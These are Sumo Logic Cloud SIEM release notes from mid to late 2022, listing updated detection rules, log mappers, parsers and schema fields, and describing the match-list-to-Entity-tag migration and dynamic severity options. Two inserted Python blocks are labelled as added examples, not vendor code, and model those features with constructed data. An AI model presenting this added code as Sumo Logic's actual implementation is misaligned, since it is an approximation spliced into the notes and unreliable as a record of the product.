  • [Updated] AWS Inspector - Custom Parser
  • [Updated] AWS Network Firewall Alerts
  • [Updated] AWS Network Firewall Flow
  • [Updated] AWS Network Firewall Netflow
  • [Updated] AWS Route 53 Logs
  • [Updated] AWS S3 Server Access Log - Custom Parser
  • [Updated] AWS Security Hub
  • [Updated] AWS Trusted Advisor
  • [Updated] AWS VPC Flow Logs - Default Format
  • [Updated] AWS VPC Flow Logs - JSON Format
  • [Updated] AWS WAF Allow Logs
  • [Updated] AWS WAF Block Logs
  • [Updated] AWSGuardDuty_Backdoor
  • [Updated] AWSGuardDuty_Behavior
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_CryptoCurrency
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] AWSGuardDuty_Exfiltration
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Persistence
  • [Updated] AWSGuardDuty_Policy
  • [Updated] AWSGuardDuty_ResourceConsumption
  • [Updated] AWSGuardDuty_Stealth
  • [Updated] AWSGuardDuty_Trojan
  • [Updated] AwsServiceEvent-AWS API Call via CloudTrail
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Falco Detection JSON
  • [Updated] Juniper SSG Series Firewall - Audit Messaging
  • [Updated] Juniper SSG Series Firewall - Traffic Messaging
  • [Updated] Microsoft IIS Parser - Catch All
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_EC2_Portscan
  • [Updated] Recon_IAMUser
  • [Updated] UnauthorizedAccess_EC2_SSHBruteForce
  • [Updated] UnauthorizedAccess_EC2_TorClient
  • [Updated] UnauthorizedAccess_EC2_TorIPCaller
  • [Updated] UnauthorizedAccess_EC2_TorRelay
  • [Updated] UnauthorizedAccess_IAMUser

Parsers

  • [Renamed] /Parsers/System/Juniper/Juniper SSC Series Firewall Syslog -> /Parsers/System/Juniper/Juniper SSG Series Firewall Syslog
  • [New] /Parsers/System/Netskope/Netskope Security Cloud JSON
  • [Updated] /Parsers/System/Falco/Falco JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft IIS

October 20, 2022 - Content Release

Rules

  • [Updated] MATCH-S00640 Kubernetes Pod Created in Kube Namespace
  • [Updated] MATCH-S00642 Kubernetes Service Account Created in Kube Namespace

Log Mappers

  • [New] Juniper SSC Series Firewall - Audit Messaging
  • [New] Juniper SSC Series Firewall - Traffic Messaging
  • [New] Linux-Sysmon/Operational - 1
  • [New] Linux-Sysmon/Operational - 10
  • [New] Linux-Sysmon/Operational - 11
  • [New] Linux-Sysmon/Operational - 15
  • [New] Linux-Sysmon/Operational - 16
  • [New] Linux-Sysmon/Operational - 17
  • [New] Linux-Sysmon/Operational - 18
  • [New] Linux-Sysmon/Operational - 2
  • [New] Linux-Sysmon/Operational - 23
  • [New] Linux-Sysmon/Operational - 3
  • [New] Linux-Sysmon/Operational - 4
  • [New] Linux-Sysmon/Operational - 5
  • [New] Linux-Sysmon/Operational - 6
  • [New] Linux-Sysmon/Operational - 7
  • [New] Linux-Sysmon/Operational - 8
  • [New] Linux-Sysmon/Operational - 9
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Azure Advanced Threat Protection
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Defender for Cloud Apps
  • [Updated] Kubernetes
  • [Updated] Microsoft Office 365 Threat Intelligence Events

Parsers

  • [New] /Parsers/System/Juniper/Juniper SSC Series Firewall Syslog
  • [New] /Parsers/System/Linux/Linux Sysmon XML

Schema

  • [New] device_k8s_deployment
  • [New] device_k8s_namespace
  • [New] device_k8s_normalizedPodName
  • [New] device_k8s_pod
  • [New] device_k8s_replicaSet
  • [New] dstDevice_k8s_deployment
  • [New] dstDevice_k8s_namespace
  • [New] dstDevice_k8s_normalizedPodName
  • [New] dstDevice_k8s_pod
  • [New] dstDevice_k8s_replicaSet
  • [New] srcDevice_k8s_deployment
  • [New] srcDevice_k8s_namespace
  • [New] srcDevice_k8s_normalizedPodName
  • [New] srcDevice_k8s_pod
  • [New] srcDevice_k8s_replicaSet
  • [Updated] device_container_runtime

October 20, 2022 - Application Update

Support for Custom Inventory Sources

Cloud SIEM now supports custom sources of inventory data. Now, if you want to ingest inventory data from a source that Sumo Logic does not provide a pre-built connector for, you can use this new feature. See the new document Configure a Custom Inventory Source for details.

Standard Match Lists

As a reminder, the migration for our out-of-the-box rules content from standard match lists to tags for Entities has begun. The system is now automatically setting the appropriate tags for any Entities appearing in any of the standard match lists called out in the previous announcement. This will continue until January 20, 2023, when the migration will be complete.

Minor Changes and Enhancements

  • [New] API endpoints have been created enabling users to upload attribute changes (such as tags or criticality) for multiple Entities in a single call, rather than having to do so one at a time. The new endpoints are /entities/bulk-add-tags, /entities/bulk-update-tags, /entities/bulk-remove-tags, /entities/bulk-update-suppressed, and /entities/bulk-update-criticality. Note that these API endpoints have a limit of 1000 entries per call. More details are available via the API Documentation link in Cloud SIEM.
  • [Updated] Previously, a new feature was added to the Enrichments tab that enabled you to hide any attribute-value pair with an "empty" value for clarity. This included values like "0" or "N/A". However, some of those values are often useful to the analyst (for example, number_of_threat_reports="0"). Starting with this release, this feature will only hide attributes with truly empty values (i.e., attribute="").

Resolved Issues

  • The CSV file upload method for updating Entity attributes did not support sensor zones or normalized entity names properly.
  • Cloud SIEM has switched providers of lists of public dynamic DNS domains, which has resolved an issue with rules utilizing these lists.

October 13, 2022 - Application Update

Announcement: Standard Match Lists Migration to Entity Tags

Currently, Cloud SIEM defines a set of standard Match Lists as a way to allow users to specify lists of Entities and other indicators that should affect whether or not Rules create Signals. However, starting next week, the Rules included with Cloud SIEM will begin transitioning to leverage Entity tags for this purpose instead. Tags on Entities are more flexible and can also provide context to analysts during the investigation phase.

Next week, a new set of standard tag schemas will be introduced in Cloud SIEM. These tag schemas will correspond to the existing standard Match Lists:

Key               Allowed Values          Equivalent Match List
_deviceGroup      admin                   admin_ips
                  awsAdmin                AWS_admin_ips
                  business                business_ips
                  gcpAdmin                GCP_admin_ips
                  googleWorkspaceAdmin    Google_Workspace_admin_ips
                  salesforceAdmin         salesforce_admin_ips
                  sandbox                 sandbox_ips
                  scanTarget              scanner_targets
_deviceService    dns                     dns_servers, dns_servers_dst, dns_servers_src
                  ftp                     ftp_servers
                  smtp                    smtp_servers
                  sql                     sql_servers
                  ssh                     ssh_servers
                  telnet                  telnet_servers
_deviceType       authServer              auth_servers, auth_servers_dst, auth_servers_src
                  lanScanner              lan_scanner_exception_ips
                  nms                     nms_ips
                  paloAltoSinkhole        palo_alto_sinkhole_ips
                  proxyServer             proxy_servers, proxy_servers_dst, proxy_servers_src
                  vpnServer               vpn_servers
                  vulnerabilityScanner    vuln_scanners
                  webServer               http_servers
_networkType      guest                   guest_networks
                  nat                     nat_ips
                  vpn                     vpn_networks
_userGroup        awsAdmin                AWS_admin_users
                  dsReplication           ds_replication_authorized_users
                  gcpAdmin                GCP_admin_users
                  googleWorkspaceAdmin    Google_Workspace_admin_users
                  kerberosDowngrade       downgrade_krb5_etype_authorized_users
                  salesforceAdmin         salesforce_admin_users

(There are five standard match lists not affected by this change, as they do not contain Entities. These include: business_asns, business_domains, business_hostnames, threat, and verified_uri_paths.)

Beginning Thursday, October 20, the contents of the standard match lists listed above will automatically be copied to tags set on the individual entities. So, for example, if an Entity 1.2.3.4 is in match list sql_servers, a tag _deviceService:sql will be set on it. Cloud SIEM will continue to automatically create these tags from the standard match lists for a period of 3 months, until January 20, 2023. During this period, pre-defined rules will be updated to reference these tags instead of the standard match lists, so by the end of this period all rules will be updated and Cloud SIEM will no longer automatically create these tags.

Please update any process you use to maintain the members of standard match lists by January 20, 2023 to maintain standard Entity tags instead (or in addition). We highly recommend you take advantage of Entity Groups to set Entity tags rather than individually setting tags. Entity Groups enable the automatic application of attributes like tags based on the Entity's value, IP address range, or inventory group.

Note that you cannot extend the standard tag schemas (for example, you cannot add a value azureAdmin to _userGroup). (The underscore prefix in the schema name means it's a system-defined schema.) Instead, create a different tag schema (such as customUserGroup) with such extended values.

You can refer to Entity tags in Rule expressions. For example, if you've attached the tag _deviceService:sql to an Entity, this statement will return "true" if that Entity is listed in a Record's srcDevice_ip field:

array_contains(fieldTags["srcDevice_ip"], "_deviceService:sql")

Additional information about the standard tag schema, match lists, Entity groups, and using these features with Rules is available in the Cloud SIEM Documentation.
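The migration and the rule-expression check described above, as an added example that is not Sumo Logic's own code: it derives standard Entity tags from standard match-list membership using the table in this announcement, models the fieldTags lookup, and evaluates array_contains(fieldTags["srcDevice_ip"], "_deviceService:sql") over a constructed Record. The match-list contents, the Record, and the helper names are constructed for illustration.

```python
"""Added example, not Sumo Logic's implementation: derives the standard Entity
tags from standard match-list membership using the announcement's table, models
the fieldTags lookup, and evaluates the rule-expression check
array_contains(fieldTags["srcDevice_ip"], "_deviceService:sql"). The match-list
contents, the Record and the helper names are constructed for illustration."""
from collections import defaultdict

# Standard match list -> (tag schema, value), transcribed from the announcement table.
MATCH_LIST_TO_TAG = {
    "admin_ips": ("_deviceGroup", "admin"),
    "AWS_admin_ips": ("_deviceGroup", "awsAdmin"),
    "business_ips": ("_deviceGroup", "business"),
    "GCP_admin_ips": ("_deviceGroup", "gcpAdmin"),
    "Google_Workspace_admin_ips": ("_deviceGroup", "googleWorkspaceAdmin"),
    "salesforce_admin_ips": ("_deviceGroup", "salesforceAdmin"),
    "sandbox_ips": ("_deviceGroup", "sandbox"),
    "scanner_targets": ("_deviceGroup", "scanTarget"),
    "dns_servers": ("_deviceService", "dns"),
    "dns_servers_dst": ("_deviceService", "dns"),
    "dns_servers_src": ("_deviceService", "dns"),
    "ftp_servers": ("_deviceService", "ftp"),
    "smtp_servers": ("_deviceService", "smtp"),
    "sql_servers": ("_deviceService", "sql"),
    "ssh_servers": ("_deviceService", "ssh"),
    "telnet_servers": ("_deviceService", "telnet"),
    "auth_servers": ("_deviceType", "authServer"),
    "auth_servers_dst": ("_deviceType", "authServer"),
    "auth_servers_src": ("_deviceType", "authServer"),
    "lan_scanner_exception_ips": ("_deviceType", "lanScanner"),
    "nms_ips": ("_deviceType", "nms"),
    "palo_alto_sinkhole_ips": ("_deviceType", "paloAltoSinkhole"),
    "proxy_servers": ("_deviceType", "proxyServer"),
    "proxy_servers_dst": ("_deviceType", "proxyServer"),
    "proxy_servers_src": ("_deviceType", "proxyServer"),
    "vpn_servers": ("_deviceType", "vpnServer"),
    "vuln_scanners": ("_deviceType", "vulnerabilityScanner"),
    "http_servers": ("_deviceType", "webServer"),
    "guest_networks": ("_networkType", "guest"),
    "nat_ips": ("_networkType", "nat"),
    "vpn_networks": ("_networkType", "vpn"),
    "AWS_admin_users": ("_userGroup", "awsAdmin"),
    "ds_replication_authorized_users": ("_userGroup", "dsReplication"),
    "GCP_admin_users": ("_userGroup", "gcpAdmin"),
    "Google_Workspace_admin_users": ("_userGroup", "googleWorkspaceAdmin"),
    "downgrade_krb5_etype_authorized_users": ("_userGroup", "kerberosDowngrade"),
    "salesforce_admin_users": ("_userGroup", "salesforceAdmin"),
}

# The standard (underscore-prefixed) schemas cannot be extended, so these are the only valid standard tags.
STANDARD_TAGS = {f"{schema}:{value}" for schema, value in MATCH_LIST_TO_TAG.values()}


def is_standard_tag(tag):
    """True for e.g. "_userGroup:awsAdmin"; False for "_userGroup:azureAdmin" (use a custom schema)."""
    return tag in STANDARD_TAGS


def migrate_match_lists(match_lists):
    """Entity -> set of "schema:value" tags derived from standard match-list membership."""
    tags = defaultdict(set)
    for list_name, members in match_lists.items():
        mapping = MATCH_LIST_TO_TAG.get(list_name)
        if mapping is None:
            continue  # business_domains, threat, etc. hold no Entities: nothing to tag
        schema, value = mapping
        for entity in members:
            tags[entity].add(f"{schema}:{value}")
    return dict(tags)


def field_tags(record, entity_tags):
    """Model of fieldTags: for each Entity-valued Record field, the tags on that Entity."""
    return {field: sorted(entity_tags.get(value, ())) for field, value in record.items()}


def array_contains(values, needle):
    """Model of the rule-expression function array_contains."""
    return needle in list(values)


def sql_source_rule(record, entity_tags):
    """The announcement's expression: is the Record's srcDevice_ip Entity tagged _deviceService:sql?"""
    return array_contains(field_tags(record, entity_tags).get("srcDevice_ip", []), "_deviceService:sql")


# Constructed sample data: the announcement's 1.2.3.4-in-sql_servers case plus a control host.
SAMPLE_MATCH_LISTS = {
    "sql_servers": {"1.2.3.4"},
    "AWS_admin_ips": {"1.2.3.4"},
    "dns_servers_src": {"10.0.0.53"},
    "business_domains": {"example.com"},  # not an Entity list: ignored by the migration
}
SAMPLE_RECORD = {"srcDevice_ip": "1.2.3.4", "dstDevice_ip": "10.0.0.53"}
```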

Minor Changes and Enhancements

  • [New] Users can now filter object lists based on tag schema. The list results will include all objects that have a tag that is part of that schema. For example, if you search for _networkType (from the note above) the list results will include any object that has a tag of _networkType:guest, _networkType:nat, and/or _networkType:vpn.

Resolved Issues

  • Entity relationships were not taking sensor zones into account properly.
  • Entity details pages were only briefly displaying the proper Criticality.
  • The Entities Count links on the Entity Criticality list pages were pointing at the wrong URLs.

October 12, 2022 - Introducing Sumo Logic Open Source Docs

Welcome to the Sumo Logic Cloud SIEM Release Notes on our new docs site! We're now open source and encourage you to contribute. We welcome all contributions, from minor typo fixes to brand new docs. Your expertise and sharing can help fellow users learn and expand their knowledge of Sumo Logic.

Here you'll find information about new and enhanced features, updated content (like rules, log mappers and parsers), bug fixes, and other important announcements for Cloud SIEM.

To view Release Notes from previous years, check the archive.

October 6, 2022 - Application Update

Application Update: Minor Changes and Enhancements

  • [Updated] Dynamic severity in rules has been enhanced. Users can now specify ranges of values to match to a specific severity. There are now multiple options, and these options can be combined (the first rule that matches is used; if none match then the default is used):
    • Equal to: exact string or mathematical match ("Equal to 4" will match "4" and 4.0 but not 4.01)
    • Greater than and Less than: mathematical only, not inclusive ("Less than 5" will match 4.9 but not 5)
    • Between: mathematical only, inclusive ("Between 5 and 10" will match 5 or 7 but not 10.1)
    • Not in the record: will match when the attribute is not listed in the record (if there is no "bro_irc_value" attribute then this rule will match; if "bro_irc_value" exists but is empty/null, this does not match)
  • [New] Users can now filter the Signals list based on the type of Rule that generated the Signal (Match, Chain, Aggregation, etc.)
  • [New] Users can now perform negative keyword searches ("not:aws" would return all objects that do not include the keyword "aws")
  • [New] Entity domain normalization can now be managed via Terraform
  • [New] Users can now configure the Email Action to send emails in plain text in addition to the previously supported multipart HTML5/text format
  • [New] Changes to the Insight Threshold are now noted in the Audit Log
  • [Deleted] As previously announced, the IBM Resilient and Sensor actions have been removed from Cloud SIEM
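The dynamic severity option semantics from the first item above, as an added example that is not Sumo Logic's code: it models string-or-numeric "Equal to", exclusive "Greater than"/"Less than", inclusive "Between", and the difference between an attribute that is absent and one that is present but empty, with first-match-wins resolution. The rule-spec dict layout, function names, and the "bro_irc_value" sample records are assumptions for illustration.

```python
"""Added example, not Sumo Logic code: a model of the dynamic-severity option
semantics described in the release note above. The operator names and edge
cases (string-or-numeric equality, exclusive greater/less than, inclusive
between, "not in the record" vs present-but-empty) follow the note; the
rule-spec dict layout and function names are assumptions for illustration."""
from typing import Any, Optional


def _as_number(value: Any) -> Optional[float]:
    """Interpret a record value numerically; None when it is not a number."""
    if isinstance(value, bool) or value is None:
        return None
    if isinstance(value, (int, float)):
        return float(value)
    if isinstance(value, str):
        try:
            return float(value.strip())
        except ValueError:
            return None
    return None


def equal_to(actual: Any, expected: Any) -> bool:
    """Exact string match or numeric equality: "4" and 4.0 equal 4, 4.01 does not."""
    if isinstance(actual, str) and isinstance(expected, str) and actual == expected:
        return True
    a, e = _as_number(actual), _as_number(expected)
    return a is not None and e is not None and a == e


def greater_than(actual: Any, bound: Any) -> bool:
    """Numeric only and exclusive: "Greater than 5" rejects 5 itself."""
    a, b = _as_number(actual), _as_number(bound)
    return a is not None and b is not None and a > b


def less_than(actual: Any, bound: Any) -> bool:
    """Numeric only and exclusive: "Less than 5" matches 4.9 but not 5."""
    a, b = _as_number(actual), _as_number(bound)
    return a is not None and b is not None and a < b


def between(actual: Any, low: Any, high: Any) -> bool:
    """Numeric only and inclusive at both ends: 5, 7 and 10 match, 10.1 does not."""
    a, lo, hi = _as_number(actual), _as_number(low), _as_number(high)
    return a is not None and lo is not None and hi is not None and lo <= a <= hi


def not_in_record(record: dict, field: str) -> bool:
    """True only when the attribute is absent; present-but-empty/null is NOT a match."""
    return field not in record


def rule_matches(record: dict, field: str, rule: dict) -> bool:
    """Evaluate one severity rule of the form {"op": ..., "args": [...], "severity": n}."""
    op, args = rule["op"], rule.get("args", [])
    if op == "not_in_record":
        return not_in_record(record, field)
    if field not in record:
        return False  # value comparisons need a value to compare against
    value = record[field]
    if op == "equal_to":
        return equal_to(value, args[0])
    if op == "greater_than":
        return greater_than(value, args[0])
    if op == "less_than":
        return less_than(value, args[0])
    if op == "between":
        return between(value, args[0], args[1])
    raise ValueError(f"unknown dynamic severity operator: {op}")


def resolve_severity(record: dict, field: str, rules: list, default: int) -> int:
    """First matching rule wins; the default severity applies when none match."""
    for rule in rules:
        if rule_matches(record, field, rule):
            return rule["severity"]
    return default


# Constructed sample: severity driven by the hypothetical "bro_irc_value" attribute.
SAMPLE_RULES = [
    {"op": "equal_to", "args": [4], "severity": 4},
    {"op": "between", "args": [5, 10], "severity": 3},
    {"op": "less_than", "args": [5], "severity": 1},
    {"op": "not_in_record", "severity": 2},
]

if __name__ == "__main__":
    for rec in ({"bro_irc_value": "4"}, {"bro_irc_value": 10.1}, {}, {"bro_irc_value": None}):
        print(rec, "->", resolve_severity(rec, "bro_irc_value", SAMPLE_RULES, 0))
```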

Resolved Issues

  • Match list items were not matching properly in some instances, such as after deletion
  • Keyword searches did not properly support values (such as hostnames) with embedded dashes
  • Changes to prototype state were not visible in the rule history
  • In some cases, the system was parsing domain names/TLDs incorrectly

Content Release

Log Mappers

  • [New] Azure Application Service Console Logs
  • [New] Google G Suite Alert Center - Sensitive Admin Action
  • [Updated] Azure Event Hub - Windows Defender Logs - DeviceAlertEvents

Parsers

  • [Updated] /Parsers/System/Google/G Suite Alert Center

Legacy Parsers

  • [Updated] CISCO_MERAKI_SECURITY_FILTERING_FILE_SCANNED
  • [Updated] CISCO_MERAKI_URLS
  • [Updated] Twistlock_Logs

September 29, 2022 - Content Release

Rules

  • [Deleted] MATCH-S00070 Checkpoint Firewall

Log Mappers

  • [New] Cyber Ark EPM AggregateEvent
  • [New] Cyber Ark EPM AuditAdmin
  • [New] Cyber Ark EPM GetComputer
  • [New] Cyber Ark EPM Policy
  • [New] Cyber Ark EPM RawDetails
  • [New] Cyber Ark EPM RawEvents

Parsers

  • [New] /Parsers/System/Cyber-Ark/CyberArk EPM JSON
  • [Updated] /Parsers/System/Auth0/Auth0

September 19, 2022 - Content Release

Rules

  • [Deleted] CHAIN-S00009 Proofpoint TAP Click Permitted Followed by Successful Request

Log Mappers

  • [New] Wiz Catch All
  • [Updated] Orca Security Parser - Catch All

Schema

  • [New] cloud_provider
  • [New] cloud_region
  • [New] cloud_service
  • [New] cloud_zone
  • [New] device_container_id
  • [New] device_container_name
  • [New] device_container_runtime
  • [New] device_image
  • [New] device_type
  • [New] dstDevice_container_id
  • [New] dstDevice_container_name
  • [New] dstDevice_container_runtime
  • [New] dstDevice_image
  • [New] dstDevice_type
  • [New] resourceType
  • [New] srcDevice_container_id
  • [New] srcDevice_container_name
  • [New] srcDevice_container_runtime
  • [New] srcDevice_image
  • [New] srcDevice_type
  • [Updated] dstDevice_uniqueId

September 12, 2022 - Application Update

Insight Enrichment Server for Fed deployment

[Update] We’ve released a new version of the Insight Enrichment Server that runs on the Sumo Logic FedRAMP-compliant deployment. This makes Cloud SIEM on FedRAMP functionally equivalent to commercial deployments of Cloud SIEM.

September 9, 2022 - Application Update

Minor Changes and Enhancements

  • [New] An API endpoint has been added which enables users to delete multiple entries in a match list in one operation: POST: /match-list-items/bulk-delete
  • [Updated] When inventory data for hosts includes both private and public IP addresses, that data will be attached to both Entities. Previously it was only attached to one of the IP address Entities.
  • [Updated] Previously we announced that the severity attribute for Insights in the Audit Logs would be switching from numbers (1-4) to text (LOW, MEDIUM, HIGH, etc). Instead, we have retained the existing numerical attribute and added a new attribute severityName containing the human-readable text.

Resolved Issues

  • In some Audit Log messages related to Insight comments, the insight_readable_id was not set correctly.
  • In some cases, manually adding or removing tags in an Insight was not being recorded in the Audit Logs properly.
  • For some customers, the bar chart on the Records list page was not rendering properly.
  • Time/date stamps were not being displayed consistently across the UI.
  • Some pages were returning intermittent 404 or internal errors.

September 8, 2022 - Content Release

In one week (2022-09-15), we will be removing CHAIN-S00009 - 'Proofpoint TAP Click Permitted Followed by Successful Request' rule to consolidate Proofpoint TAP rules while providing equivalent detection value.

Rules

  • [Updated] MATCH-S00819 Chromium Process Started With Debugging Port

Log Mappers

  • [Updated] Aruba ClearPass Syslog

Parsers

  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft IIS

September 1, 2022 - Application Update

Announcements

  • Starting October 1, 2022, suppressed Signals will be retained in Cloud SIEM for 30 days (previously, they were retained for 90 days). All Signals are automatically stored in the Sumo sec_signals index for 2 years, so users searching for suppressed Signals more than 30 days old should search in that index instead of in the Cloud SIEM UI.
    • Note also that in the past, Signals attached to Insights were searchable from the Cloud SIEM Signals list page indefinitely. Starting on October 1, they will only be searchable for 365 days. (They will still be visible from the Insight details page beyond that period.)
  • As previously announced, the Sensor and IBM Resilient actions are no longer supported. They will be removed from Cloud SIEM by the end of this month.

Minor Changes and Enhancements

  • [New] In the Audit Log, when an Insight is created, the sum of the included Signals' severity is now included with the insight in the risk_score field (i.e. if there were three Signals each with a severity of 4, the sum of 12 will be included).
  • [Updated] The "Copy Expression" mouse action for record fields can now be activated using Shift+Click. The Click action now brings up a "Copy Value" action instead.
  • [New] Users can now delete Match Lists from the list view (i.e. users no longer have to go into the details).
  • [New] On the Criticality list page, the number of Entity Groups associated with each Criticality is now listed on the cards.

Resolved Issues

  • In some cases where the Signals were relatively old, the Signals that contributed to an Insight were no longer visible in the Insight in the UI.
  • Time stamps were missing from Records in some views.

Content Release

In 2 weeks (2022-09-15) we will be removing CHAIN-S00009 - 'Proofpoint TAP Click Permitted Followed by Successful Request' rule to consolidate Proofpoint TAP rules while providing equivalent detection value.

Rules

  • [New] MATCH-S00818 Azure PRT Token Issued via Non Interactive Login
  • [New] MATCH-S00821 Chromium Browser History Access by Non-Browser Process
  • [New] MATCH-S00819 Chromium Process Started With Debugging Port
  • [New] MATCH-S00820 Cloud Credential File Accessed
  • [New] MATCH-S00817 Suspicious Azure Active Directory Device Code Authentication
  • [Updated] MATCH-S00235 Azure - Create User

Log Mappers

  • [New] Mimecast AV Event
  • [New] Mimecast Impersonation Event
  • [New] Mimecast Spam Event
  • [Updated] AzureActivityLog AuditLogs

August 25, 2022 - Application Update

Application Update

Cloud SIEM App is now available

The Cloud SIEM app gives you visibility into what’s going on in Cloud SIEM. The app dashboards present high-level and detailed views into the Records that were created, the Signals that have fired, and the Insights generated by Cloud SIEM. You can also get insight in Cloud SIEM rules, including rule management activity, and which rules have fired.

This app is available to all licensed Cloud SIEM customers in the Sumo Logic App Catalog. For more information, see Cloud SIEM App.

Content Release

Rules

  • [Updated] MATCH-S00632 Okta Administrator Access Granted
  • [Updated] MATCH-S00683 Overly Permissive Chmod Command

Log Mappers

  • [New] Check Point Avanan
  • [New] Cisco ISE Authentication Failure
  • [New] Cisco ISE Authentication Success
  • [New] Cisco ISE Catch All
  • [New] FireEye Web MPS Event
  • [Updated] Microsoft Office 365 Threat Intelligence Events
  • [Updated] Windows Microsoft-Windows-Sysmon/Operational 3
  • [Updated] Windows Security 4688

Parsers

  • [New] /Parsers/System/Check Point/Check Point Avanan JSON
  • [New] /Parsers/System/Cisco/Cisco ISE
  • [New] /Parsers/System/FireEye/FireEye Web MPS JSON

August 18, 2022 - Application Update

Resolved Issues

  • Several issues were resolved related to the bulk upload of Entity attributes, including errors with CSV file parsing, editing uploaded attributes in the UI, and a lack of audit logging.
  • On the Entity details page, the criticality was not being displayed properly.
  • Labels were not being created properly based on Network Blocks for a small number of customers.
  • InsightCommentCreated audit events did not include the readableId attribute.
  • For some record types, the Actions field was not being displayed if selected as a favorite field.

July 28, 2022 - Application Update

Read-Only User Capabilities for Cloud SIEM

New user capabilities (permissions) have been created enabling read-only access to content and configuration features in Cloud SIEM.

